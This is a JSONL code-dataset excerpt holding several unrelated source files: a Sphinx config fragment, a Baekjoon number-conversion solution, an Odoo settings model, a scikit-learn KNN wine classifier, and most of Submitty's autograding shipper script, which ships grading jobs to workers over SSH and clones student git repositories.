True\nnapoleon_include_special_with_doc = True\ntodo_include_todos = True\n\n#autodoc_default_options = {\n# 'inherited-members': True\n#}\n","repo_name":"trailofbits/graphtage","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":2275,"dataset":"github-code","pt":"37"} +{"seq_id":"7936496181","text":"import sys\nimport collections\n\nsys.stdin = open('1373.txt', 'r')\ninp = collections.deque(list(sys.stdin.readline().strip()))\n\nr = collections.deque([])\ni, n = 0, 0\n\nwhile inp:\n tmp = int(inp.pop())\n\n if tmp:\n n += 2 ** i\n i += 1\n\n if i == 3 or not inp:\n r.insert(0, str(n))\n i, n = 0, 0\n\n# while r != ['0'] and r[0] == '0':\nwhile len(r) > 1 and r[0] == '0':\n r.popleft()\nfor rr in r:\n print(rr, end='')\n","repo_name":"anyl92/ALGORITHM","sub_path":"baek/baek_1373_28.py","file_name":"baek_1373_28.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34158955221","text":"from odoo import api, fields, models\nfrom ast import literal_eval\n\nclass SchoolSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n school_student_enable_configuration = fields.Boolean(string=\"Enable Configuration\")\n school_student_default_age = fields.Char(string='Age')\n product_default = fields.Many2one('product.product', string='Default Product')\n # many2many will give you multiselect options, when many2one only give you select option\n # to use many2many, we can declare the middle table to connect 2 tables together.\n # in this example, i create a new table named 'config_product_rel'\n # with 2 column connect 2 table that is 'id' for the 'ir_config_parameter' table (current table)\n # and 'product_id' for 'product_product' table\n product_default_many2many = fields.Many2many('product.product', 'config_product_rel', 'id', 'product_id',\n 'Default Product Many2many')\n\n @api.model\n def get_values(self):\n res = super(SchoolSettings, self).get_values()\n res['school_student_enable_configuration'] = self.env['ir.config_parameter'].sudo().get_param('school.school_student_enable_configuration')\n res['school_student_default_age'] = self.env['ir.config_parameter'].sudo().get_param('school.school_student_default_age')\n res['product_default'] = int(self.env['ir.config_parameter'].sudo().get_param('school.product_default'))\n\n # set values for many2many field\n if self.env['ir.config_parameter'].sudo().get_param('school.product_default_many2many'):\n product_default_many2many = self.env['ir.config_parameter'].sudo().get_param('school.product_default_many2many')\n res['product_default_many2many'] = [(6, 0, literal_eval(product_default_many2many))]\n\n return res\n\n\n def set_values(self):\n super(SchoolSettings, self).set_values()\n self.env['ir.config_parameter'].set_param('school.school_student_enable_configuration', self.school_student_enable_configuration)\n self.env['ir.config_parameter'].set_param('school.school_student_default_age', self.school_student_default_age)\n # get value for many2one field\n self.env['ir.config_parameter'].set_param('school.product_default', self.product_default.id)\n # get values for many2many field\n self.env['ir.config_parameter'].set_param('school.product_default_many2many', self.product_default_many2many.ids)","repo_name":"congson95dev/odoo-15-school","sub_path":"school/models/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30533593709","text":"#加载红酒数据集\nfrom sklearn.datasets import load_wine\n#KNN分类算法\nfrom sklearn.neighbors import KNeighborsClassifier\n#分割训练集与测试集\nfrom sklearn.model_selection import train_test_split\n#导入numpy\nimport numpy as np\n#加载数据集\nwine_dataset=load_wine()\n#查看数据集对应的键\nprint(\"红酒数据集的键:\\n{}\".format(wine_dataset.keys()))\nprint(\"数据集描述:\\n{}\".format(wine_dataset['data'].shape))\n# data 为数据集数据;target 为样本标签\n#分割数据集,比例为 训练集:测试集 = 8:2\nX_train,X_test,y_train,y_test=train_test_split(wine_dataset['data'],wine_dataset['target'],test_size=0.2,random_state=0)\n#构建knn分类模型,并指定 k 值\nKNN=KNeighborsClassifier(n_neighbors=10)\n#使用训练集训练模型\nKNN.fit(X_train,y_train)\n#评估模型的得分\nscore=KNN.score(X_test,y_test)\nprint(score)\n#给出一组数据对酒进行分类\nX_wine_test=np.array([[11.8,4.39,2.39,29,82,2.86,3.53,0.21,2.85,2.8,.75,3.78,490]])\npredict_result=KNN.predict(X_wine_test)\nprint(predict_result)\nprint(\"分类结果:{}\".format(wine_dataset['target_names'][predict_result]))","repo_name":"YuanjieHuang/mycode_kali","sub_path":"python/scikit_learn/K_Nearest_Neighbor.py","file_name":"K_Nearest_Neighbor.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17022675903","text":"#!/usr/bin/env python3\n\nimport os\nimport time\nimport signal\nimport json\n\nimport shutil\nimport contextlib\nimport datetime\nimport multiprocessing\nfrom pathlib import Path\nfrom submitty_utils import dateutils\nimport operator\nimport paramiko\nimport tempfile\nimport socket\nimport traceback\nimport subprocess\n\nfrom autograder import autograding_utils\nfrom autograder import packer_unpacker\n\nCONFIG_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'config')\nwith open(os.path.join(CONFIG_PATH, 'submitty.json')) as open_file:\n OPEN_JSON = json.load(open_file)\nSUBMITTY_DATA_DIR = OPEN_JSON['submitty_data_dir']\nSUBMITTY_INSTALL_DIR = OPEN_JSON['submitty_install_dir']\nAUTOGRADING_LOG_PATH = OPEN_JSON['autograding_log_path']\nAUTOGRADING_STACKTRACE_PATH = os.path.join(OPEN_JSON['autograding_log_path'], 'stack_traces')\n\nwith open(os.path.join(CONFIG_PATH, 'submitty_users.json')) as open_file:\n OPEN_JSON = json.load(open_file)\nDAEMON_UID = OPEN_JSON['daemon_uid']\n\nINTERACTIVE_QUEUE = os.path.join(SUBMITTY_DATA_DIR, \"to_be_graded_queue\")\n\nJOB_ID = '~SHIP~'\n\n\n# ==================================================================================\ndef initialize(untrusted_queue):\n \"\"\"\n Initializer function for all our processes. We get one untrusted user off our queue which\n we then set in our Process. We cannot recycle the shipper process as else the untrusted user\n we set for this process will be lost.\n\n :param untrusted_queue: multiprocessing.queues.Queue that contains all untrusted users left to\n assign\n \"\"\"\n multiprocessing.current_process().untrusted = untrusted_queue.get()\n\n# ==================================================================================\ndef add_fields_to_autograding_worker_json(autograding_worker_json, entry):\n\n submitty_config = os.path.join(SUBMITTY_INSTALL_DIR, 'config', 'version.json')\n\n try:\n with open(submitty_config) as infile:\n submitty_details = json.load(infile)\n installed_commit = submitty_details['installed_commit']\n most_recent_tag = submitty_details['most_recent_git_tag']\n except FileNotFoundError as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, trace=traceback.format_exc())\n raise SystemExit(\"ERROR, could not locate the submitty.json:\", e)\n\n autograding_worker_json[entry]['server_name'] = socket.getfqdn()\n autograding_worker_json[entry]['primary_commit'] = installed_commit\n autograding_worker_json[entry]['most_recent_tag'] = most_recent_tag\n return autograding_worker_json\n# ==================================================================================\ndef update_all_foreign_autograding_workers():\n success_map = dict()\n all_workers_json = os.path.join(SUBMITTY_INSTALL_DIR, 'config', \"autograding_workers.json\")\n\n try:\n with open(all_workers_json, 'r') as infile:\n autograding_workers = json.load(infile)\n except FileNotFoundError as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, trace=traceback.format_exc())\n raise SystemExit(\"ERROR, could not locate autograding_workers_json :\", e)\n\n for key, value in autograding_workers.items():\n if value['enabled'] == False:\n continue\n formatted_entry = {key: value}\n formatted_entry = add_fields_to_autograding_worker_json(formatted_entry, key)\n success = update_worker_json(key, formatted_entry)\n success_map[key] = success\n return success_map\n\n# ==================================================================================\n# Updates the autograding_worker.json in a workers autograding_TODO folder (tells it)\n# how many threads to be running on startup.\ndef update_worker_json(name, entry):\n\n fd, tmp_json_path = tempfile.mkstemp()\n foreign_json = os.path.join(SUBMITTY_DATA_DIR, \"autograding_TODO\", \"autograding_worker.json\")\n autograding_worker_to_ship = entry\n\n try:\n user = autograding_worker_to_ship[name]['username']\n host = autograding_worker_to_ship[name]['address']\n except Exception as e:\n print(\"ERROR: autograding_workers.json entry for {0} is malformatted. {1}\".format(e, name))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: autograding_workers.json entry for {0} is malformed. {1}\".format(e, name))\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n return False\n\n #create a new temporary json with only the entry for the current machine.\n with open(tmp_json_path, 'w') as outfile:\n json.dump(autograding_worker_to_ship, outfile, sort_keys=True, indent=4)\n #if we are updating the current machine, we can just move the new json to the appropriate spot (no ssh needed)\n if host == \"localhost\":\n try:\n shutil.move(tmp_json_path,foreign_json)\n print(\"Successfully updated local autograding_TODO/autograding_worker.json\")\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"Successfully updated local autograding_TODO/autograding_worker.json\")\n return True\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: could not mv to local autograding_TODO/autograding_worker.json due to the following error: \"+str(e))\n print(\"ERROR: could not mv to local autograding_worker.json due to the following error: {0}\".format(e))\n return False\n finally:\n os.close(fd)\n #if we are updating a foreign machine, we must connect via ssh and use sftp to update it.\n else:\n #try to establish an ssh connection to the host\n try:\n ssh = paramiko.SSHClient()\n ssh.get_host_keys()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(hostname = host, username = user, timeout=5)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: could not ssh to {0}@{1} due to following error: {2}\".format(user, host,str(e)))\n print(\"ERROR: could not ssh to {0}@{1} due to following error: {2}\".format(user, host,str(e)))\n return False\n #try to copy the files over to the host\n try:\n sftp = ssh.open_sftp()\n\n sftp.put(tmp_json_path,foreign_json)\n\n sftp.close()\n print(\"Successfully forwarded autograding_worker.json to {0}\".format(name))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"Successfully forwarded autograding_worker.json to {0}\".format(name))\n success = True\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: could not sftp to foreign autograding_TODO/autograding_worker.json due to the following error: \"+str(e))\n print(\"ERROR: could sftp to foreign autograding_TODO/autograding_worker.json due to the following error: {0}\".format(e))\n success = False\n finally:\n os.close(fd)\n os.remove(tmp_json_path)\n sftp.close()\n ssh.close()\n return success\n\n# ==================================================================================\ndef prepare_job(my_name,which_machine,which_untrusted,next_directory,next_to_grade):\n # verify the DAEMON_USER is running this script\n if not int(os.getuid()) == int(DAEMON_UID):\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: must be run by DAEMON_USER\")\n raise SystemExit(\"ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER\")\n\n if which_machine == 'localhost':\n address = which_machine\n else:\n address = which_machine.split('@')[1]\n\n # prepare the zip files\n try:\n autograding_zip_tmp,submission_zip_tmp = packer_unpacker.prepare_autograding_and_submission_zip(which_machine,which_untrusted,next_directory,next_to_grade)\n fully_qualified_domain_name = socket.getfqdn()\n servername_workername = \"{0}_{1}\".format(fully_qualified_domain_name, address)\n autograding_zip = os.path.join(SUBMITTY_DATA_DIR,\"autograding_TODO\",servername_workername+\"_\"+which_untrusted+\"_autograding.zip\")\n submission_zip = os.path.join(SUBMITTY_DATA_DIR,\"autograding_TODO\",servername_workername+\"_\"+which_untrusted+\"_submission.zip\")\n todo_queue_file = os.path.join(SUBMITTY_DATA_DIR,\"autograding_TODO\",servername_workername+\"_\"+which_untrusted+\"_queue.json\")\n\n with open(next_to_grade, 'r') as infile:\n queue_obj = json.load(infile)\n queue_obj[\"which_untrusted\"] = which_untrusted\n queue_obj[\"which_machine\"] = which_machine\n queue_obj[\"ship_time\"] = dateutils.write_submitty_date(microseconds=True)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: failed preparing submission zip or accessing next to grade \"+str(e))\n print(\"ERROR: failed preparing submission zip or accessing next to grade \", e)\n return False\n\n if address == \"localhost\":\n try:\n shutil.move(autograding_zip_tmp,autograding_zip)\n shutil.move(submission_zip_tmp,submission_zip)\n with open(todo_queue_file, 'w') as outfile:\n json.dump(queue_obj, outfile, sort_keys=True, indent=4)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: could not move files due to the following error: \"+str(e))\n print(\"ERROR: could not move files due to the following error: {0}\".format(e))\n return False\n else:\n try:\n user, host = which_machine.split(\"@\")\n ssh = paramiko.SSHClient()\n ssh.get_host_keys()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n ssh.connect(hostname = host, username = user, timeout=5)\n sftp = ssh.open_sftp()\n\n sftp.put(autograding_zip_tmp,autograding_zip)\n sftp.put(submission_zip_tmp,submission_zip)\n with open(todo_queue_file, 'w') as outfile:\n json.dump(queue_obj, outfile, sort_keys=True, indent=4)\n sftp.put(todo_queue_file, todo_queue_file)\n os.remove(todo_queue_file)\n print(\"Successfully forwarded files to {0}\".format(my_name))\n success = True\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: could not move files due to the following error: \"+str(e))\n print(\"Could not move files due to the following error: {0}\".format(e))\n success = False\n finally:\n sftp.close()\n ssh.close()\n os.remove(autograding_zip_tmp)\n os.remove(submission_zip_tmp)\n return success\n\n # log completion of job preparation\n obj = packer_unpacker.load_queue_file_obj(JOB_ID,next_directory,next_to_grade)\n partial_path = os.path.join(obj[\"gradeable\"],obj[\"who\"],str(obj[\"version\"]))\n item_name = os.path.join(obj[\"semester\"],obj[\"course\"],\"submissions\",partial_path)\n is_batch = \"regrade\" in obj and obj[\"regrade\"]\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, jobname=item_name, which_untrusted=which_untrusted,\n is_batch=is_batch, message=\"Prepared job for \" + which_machine)\n return True\n\n\n# ==================================================================================\n# ==================================================================================\ndef unpack_job(which_machine,which_untrusted,next_directory,next_to_grade):\n\n # variables needed for logging\n obj = packer_unpacker.load_queue_file_obj(JOB_ID,next_directory,next_to_grade)\n partial_path = os.path.join(obj[\"gradeable\"],obj[\"who\"],str(obj[\"version\"]))\n item_name = os.path.join(obj[\"semester\"],obj[\"course\"],\"submissions\",partial_path)\n is_batch = \"regrade\" in obj and obj[\"regrade\"]\n\n # verify the DAEMON_USER is running this script\n if not int(os.getuid()) == int(DAEMON_UID):\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: must be run by DAEMON_USER\")\n raise SystemExit(\"ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER\")\n\n if which_machine == 'localhost':\n address = which_machine\n else:\n address = which_machine.split('@')[1]\n\n fully_qualified_domain_name = socket.getfqdn()\n servername_workername = \"{0}_{1}\".format(fully_qualified_domain_name, address)\n target_results_zip = os.path.join(SUBMITTY_DATA_DIR,\"autograding_DONE\",servername_workername+\"_\"+which_untrusted+\"_results.zip\")\n target_done_queue_file = os.path.join(SUBMITTY_DATA_DIR,\"autograding_DONE\",servername_workername+\"_\"+which_untrusted+\"_queue.json\")\n\n if which_machine == \"localhost\":\n if not os.path.exists(target_done_queue_file):\n return False\n else:\n local_done_queue_file = target_done_queue_file\n local_results_zip = target_results_zip\n else:\n user, host = which_machine.split(\"@\")\n ssh = paramiko.SSHClient()\n ssh.get_host_keys()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n try:\n ssh.connect(hostname = host, username = user, timeout=5)\n\n sftp = ssh.open_sftp()\n fd1, local_done_queue_file = tempfile.mkstemp()\n fd2, local_results_zip = tempfile.mkstemp()\n #remote path first, then local.\n sftp.get(target_done_queue_file, local_done_queue_file)\n sftp.get(target_results_zip, local_results_zip)\n #Because get works like cp rather tnan mv, we have to clean up.\n sftp.remove(target_done_queue_file)\n sftp.remove(target_results_zip)\n success = True\n #This is the normal case (still grading on the other end) so we don't need to print anything.\n except FileNotFoundError:\n os.remove(local_results_zip)\n os.remove(local_done_queue_file)\n success = False\n #In this more general case, we do want to print what the error was.\n #TODO catch other types of exception as we identify them.\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: Could not retrieve the file from the foreign machine \"+str(e))\n print(\"ERROR: Could not retrieve the file from the foreign machine.\\nERROR: {0}\".format(e))\n os.remove(local_results_zip)\n os.remove(local_done_queue_file)\n success = False\n finally:\n os.close(fd1)\n os.close(fd2)\n sftp.close()\n ssh.close()\n if not success:\n return False\n # archive the results of grading\n try:\n success = packer_unpacker.unpack_grading_results_zip(which_machine,which_untrusted,local_results_zip)\n except:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID,jobname=item_name,message=\"ERROR: Exception when unpacking zip. For more details, see traces entry.\")\n with contextlib.suppress(FileNotFoundError):\n os.remove(local_results_zip)\n success = False\n\n with contextlib.suppress(FileNotFoundError):\n os.remove(local_done_queue_file)\n\n msg = \"Unpacked job from \" + which_machine if success else \"ERROR: failure returned from worker machine\"\n print(msg)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, jobname=item_name, which_untrusted=which_untrusted, is_batch=is_batch, message=msg)\n return True\n\n\n# ==================================================================================\ndef grade_queue_file(my_name, which_machine,which_untrusted,queue_file):\n \"\"\"\n Oversees the autograding of single item from the queue\n\n :param queue_file: details of what to grade\n :param which_machine: name of machine to send this job to (might be \"localhost\")\n :param which_untrusted: specific untrusted user for this autograding job\n \"\"\"\n\n my_dir,my_file=os.path.split(queue_file)\n pid = os.getpid()\n directory = os.path.dirname(os.path.realpath(queue_file))\n name = os.path.basename(os.path.realpath(queue_file))\n grading_file = os.path.join(directory, \"GRADING_\" + name)\n\n #TODO: break which_machine into id, address, and passphrase.\n \n try:\n # prepare the job\n shipper_counter=0\n\n prep_job_success = prepare_job(my_name,which_machine, which_untrusted, my_dir, queue_file)\n if not prep_job_success:\n print (my_name, \" ERROR unable to prepare job: \", queue_file)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+\" ERROR unable to prepare job: \" + queue_file)\n\n else:\n # then wait for grading to be completed\n shipper_counter=0\n while not unpack_job(which_machine, which_untrusted, my_dir, queue_file):\n shipper_counter+=1\n time.sleep(1)\n if shipper_counter >= 10:\n print (my_name,which_untrusted,\"shipper wait for grade: \",queue_file)\n shipper_counter=0\n\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n print (my_name, \" ERROR attempting to grade item: \", queue_file, \" exception=\",str(e))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+\" ERROR attempting to grade item: \" + queue_file + \" exception \" + repr(e))\n\n # note: not necessary to acquire lock for these statements, but\n # make sure you remove the queue file, then the grading file\n try:\n os.remove(queue_file)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n print (my_name, \" ERROR attempting to remove queue file: \", queue_file, \" exception=\",str(e))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+\" ERROR attempting to remove queue file: \" + queue_file + \" exception=\" + str(e))\n try:\n os.remove(grading_file)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n print (my_name, \" ERROR attempting to remove grading file: \", grading_file, \" exception=\",str(e))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+\" ERROR attempting to remove grading file: \" + grading_file + \" exception=\" + str(e))\n\n\n# ==================================================================================\n# ==================================================================================\ndef valid_github_user_id(userid):\n # Github username may only contain alphanumeric characters or\n # hyphens. Github username cannot have multiple consecutive\n # hyphens. Github username cannot begin or end with a hyphen.\n # Maximum is 39 characters.\n #\n # NOTE: We only scrub the input for allowed characters.\n if (userid==''):\n # GitHub userid cannot be empty\n return False\n checklegal = lambda char: char.isalnum() or char == '-'\n filtered_userid = ''.join(list(filter(checklegal,userid)))\n if not userid == filtered_userid:\n return False\n return True\n\n\ndef valid_github_repo_id(repoid):\n # Only characters, numbers, dots, minus and underscore are allowed.\n if (repoid==''):\n # GitHub repoid cannot be empty\n return False\n checklegal = lambda char: char.isalnum() or char == '.' or char == '-' or char == '_'\n filtered_repoid = ''.join(list(filter(checklegal,repoid)))\n if not repoid == filtered_repoid:\n return False\n return True\n\n\ndef checkout_vcs_repo(my_file):\n print (\"SHIPPER CHECKOUT VCS REPO \", my_file)\n\n with open(my_file, 'r') as infile:\n obj = json.load(infile)\n\n partial_path = os.path.join(obj[\"gradeable\"],obj[\"who\"],str(obj[\"version\"]))\n course_dir = os.path.join(SUBMITTY_DATA_DIR, \"courses\", obj[\"semester\"], obj[\"course\"])\n submission_path = os.path.join(course_dir, \"submissions\", partial_path)\n checkout_path = os.path.join(course_dir, \"checkout\", partial_path)\n results_path = os.path.join(course_dir, \"results\", partial_path)\n\n is_vcs,vcs_type,vcs_base_url,vcs_subdirectory = packer_unpacker.get_vcs_info(SUBMITTY_DATA_DIR,obj[\"semester\"],obj[\"course\"],obj[\"gradeable\"],obj[\"who\"],obj[\"team\"])\n\n # cleanup the previous checkout (if it exists)\n shutil.rmtree(checkout_path,ignore_errors=True)\n os.makedirs(checkout_path, exist_ok=True)\n\n job_id = \"~VCS~\"\n\n try:\n # If we are public or private github, we will have an empty vcs_subdirectory\n if vcs_subdirectory == '':\n with open (os.path.join(submission_path,\".submit.VCS_CHECKOUT\")) as submission_vcs_file:\n VCS_JSON = json.load(submission_vcs_file)\n git_user_id = VCS_JSON[\"git_user_id\"]\n git_repo_id = VCS_JSON[\"git_repo_id\"]\n if not valid_github_user_id(git_user_id):\n raise Exception (\"Invalid GitHub user/organization name: '\"+git_user_id+\"'\")\n if not valid_github_repo_id(git_repo_id):\n raise Exception (\"Invalid GitHub repository name: '\"+git_repo_id+\"'\")\n # construct path for GitHub\n vcs_path=\"https://www.github.com/\"+git_user_id+\"/\"+git_repo_id\n\n # is vcs_subdirectory standalone or should it be combined with base_url?\n elif vcs_subdirectory[0] == '/' or '://' in vcs_subdirectory:\n vcs_path = vcs_subdirectory\n else:\n if '://' in vcs_base_url:\n vcs_path = urllib.parse.urljoin(vcs_base_url, vcs_subdirectory)\n else:\n vcs_path = os.path.join(vcs_base_url, vcs_subdirectory)\n\n # warning: --depth is ignored in local clones; use file:// instead.\n if not '://' in vcs_path:\n vcs_path = \"file:///\" + vcs_path\n\n Path(results_path+\"/logs\").mkdir(parents=True, exist_ok=True)\n checkout_log_file = os.path.join(results_path, \"logs\", \"vcs_checkout.txt\")\n\n # grab the submission time\n with open (os.path.join(submission_path,\".submit.timestamp\")) as submission_time_file:\n submission_string = submission_time_file.read().rstrip()\n\n\n # OPTION: A shallow clone with only the most recent commit\n # from the submission timestamp.\n #\n # NOTE: if the student has set their computer time in the\n # future, they could be confused that we don't grab their\n # most recent code.\n # NOTE: github repos currently fail (a bug?) with an error when\n # --shallow-since is used:\n # \"fatal: The remote end hung up unexpectedly\"\n #\n #clone_command = ['/usr/bin/git', 'clone', vcs_path, checkout_path, '--shallow-since='+submission_string, '-b', 'master']\n\n\n # OPTION: A shallow clone, with just the most recent commit.\n #\n # NOTE: If the server is busy, it might take seconds or\n # minutes for an available shipper to process the git\n # clone, and thethe timestamp might be slightly late)\n #\n # So we choose this option! (for now)\n #\n clone_command = ['/usr/bin/git', 'clone', vcs_path, checkout_path, '--depth', '1', '-b', 'master']\n\n\n with open(checkout_log_file, 'a') as f:\n print(\"VCS CHECKOUT\", file=f)\n print('vcs_base_url', vcs_base_url, file=f)\n print('vcs_subdirectory', vcs_subdirectory, file=f)\n print('vcs_path', vcs_path, file=f)\n print(' '.join(clone_command), file=f)\n print(\"\\n====================================\\n\", file=f)\n\n # git clone may fail -- because repository does not exist,\n # or because we don't have appropriate access credentials\n try:\n subprocess.check_call(clone_command)\n os.chdir(checkout_path)\n\n # determine which version we need to checkout\n # if the repo is empty or the master branch does not exist, this command will fail\n try:\n what_version = subprocess.check_output(['git', 'rev-list', '-n', '1', 'master'])\n # old method: when we had the full history, roll-back to a version by date\n #what_version = subprocess.check_output(['git', 'rev-list', '-n', '1', '--before=\"'+submission_string+'\"', 'master'])\n what_version = str(what_version.decode('utf-8')).rstrip()\n if what_version == \"\":\n # oops, pressed the grade button before a valid commit\n shutil.rmtree(checkout_path, ignore_errors=True)\n # old method:\n #else:\n # # and check out the right version\n # subprocess.call(['git', 'checkout', '-b', 'grade', what_version])\n\n subprocess.call(['ls', '-lR', checkout_path], stdout=open(checkout_log_file, 'a'))\n print(\"\\n====================================\\n\", file=open(checkout_log_file, 'a'))\n subprocess.call(['du', '-skh', checkout_path], stdout=open(checkout_log_file, 'a'))\n obj['revision'] = what_version\n\n # exception on git rev-list\n except subprocess.CalledProcessError as error:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message=\"ERROR: failed to determine version on master branch \" + str(error))\n os.chdir(checkout_path)\n with open(os.path.join(checkout_path,\"failed_to_determine_version_on_master_branch.txt\"),'w') as f:\n print(str(error),file=f)\n print(\"\\n\",file=f)\n print(\"Check to be sure the repository is not empty.\\n\",file=f)\n print(\"Check to be sure the repository has a master branch.\\n\",file=f)\n print(\"And check to be sure the timestamps on the master branch are reasonable.\\n\",file=f)\n\n # exception on git clone\n except subprocess.CalledProcessError as error:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message=\"ERROR: failed to clone repository \" + str(error))\n os.chdir(checkout_path)\n with open(os.path.join(checkout_path,\"failed_to_clone_repository.txt\"),'w') as f:\n print(str(error),file=f)\n print(\"\\n\",file=f)\n print(\"Check to be sure the repository exists.\\n\",file=f)\n print(\"And check to be sure the submitty_daemon user has appropriate access credentials.\\n\",file=f)\n\n # exception in constructing full git repository url/path\n except Exception as error:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message=\"ERROR: failed to construct valid repository url/path\" + str(error))\n os.chdir(checkout_path)\n with open(os.path.join(checkout_path,\"failed_to_construct_valid_repository_url.txt\"),'w') as f:\n print(str(error),file=f)\n print(\"\\n\",file=f)\n print(\"Check to be sure the repository exists.\\n\",file=f)\n print(\"And check to be sure the submitty_daemon user has appropriate access credentials.\\n\",file=f)\n\n return obj\n\n# ==================================================================================\ndef get_job(my_name,which_machine,my_capabilities,which_untrusted,overall_lock):\n \"\"\"\n Picks a job from the queue\n\n :param overall_lock: a lock on the directory containing all queue files\n \"\"\"\n\n time_get_job_begin = dateutils.get_current_time()\n\n overall_lock.acquire()\n folder= INTERACTIVE_QUEUE\n\n\n # ----------------------------------------------------------------\n # Our first priority is to perform any awaiting VCS checkouts\n\n # Note: This design is imperfect:\n #\n # * If all shippers are busy working on long-running autograding\n # tasks there will be a delay of seconds or minutes between\n # a student pressing the submission button and clone happening.\n # This is a minor exploit allowing them to theoretically\n # continue working on their submission past the deadline for\n # the time period of the delay.\n # -- This is not a significant, practical problem.\n #\n # * If multiple and/or large git submissions arrive close\n # together, this shipper job will be tied up performing these\n # clone operations. Because we don't release the lock, any\n # other shippers that complete their work will also be blocked\n # from either helping with the clones or tackling the next\n # autograding job.\n # -- Based on experience with actual submission patterns, we\n # do not anticipate that this will be a significant\n # bottleneck at this time.\n #\n # * If a git clone takes a very long time and/or hangs because of\n # network problems, this could halt all work on the server.\n # -- We'll need to monitor the production server.\n #\n # We plan to do a complete overhaul of the\n # scheduler/shipper/worker and refactoring this design should be\n # part of the project.\n\n # Grab all the VCS files currently in the folder...\n vcs_files = [str(f) for f in Path(folder).glob('VCS__*')]\n for f in vcs_files:\n vcs_file = f[len(folder)+1:]\n no_vcs_file = f[len(folder)+1+5:]\n # do the checkout\n updated_obj = checkout_vcs_repo(folder+\"/\"+vcs_file)\n # save the regular grading queue file\n with open(os.path.join(folder,no_vcs_file), \"w\") as queue_file:\n json.dump(updated_obj, queue_file)\n # cleanup the vcs queue file\n os.remove(folder+\"/\"+vcs_file)\n # ----------------------------------------------------------------\n\n\n # Grab all the files currently in the folder, sorted by creation\n # time, and put them in the queue to be graded\n files = [str(f) for f in Path(folder).glob('*')]\n files_and_times = list()\n for f in files:\n try:\n my_time = os.path.getctime(f)\n except:\n continue\n tup = (f, my_time)\n files_and_times.append(tup)\n\n files_and_times = sorted(files_and_times, key=operator.itemgetter(1))\n my_job=\"\"\n\n for full_path_file, file_time in files_and_times:\n # get the file name (without the path)\n just_file = full_path_file[len(folder)+1:]\n # skip items that are already being graded\n if (just_file[0:8]==\"GRADING_\"):\n continue\n 